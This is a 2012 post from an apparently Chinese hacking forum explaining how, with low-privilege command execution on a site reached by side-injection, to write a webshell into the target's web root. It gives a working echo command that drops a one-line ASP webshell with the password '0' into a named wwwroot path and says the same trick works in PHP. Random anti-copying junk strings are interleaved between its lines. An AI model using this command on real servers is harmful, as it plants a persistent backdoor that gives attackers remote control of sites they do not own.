找回密码
 立即注册
查看: 2568|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。) D% `! f" K0 H) b, X6 j" l* ^( Q
6 p5 X* S$ l. f/ d+ Q# w6 p3 ^
命令格式
0 x  B4 n6 i+ \  N& K8 z/ K
- o% b& P* s) m0 F: t9 YEcho 语句 >目标站绝对目录
8 j0 a7 m+ s/ i8 i, e% i+ l5 i: }. T9 s
例如:
) N7 M3 ]( w8 V1 w: b* o0 V
2 {8 S. t# X2 ]/ C/ eecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
9 m) M& i% F! ~$ Y
: T* {( d0 ~+ K+ _5 g& F( q这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
% N( U$ A" O% {( d* W' Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表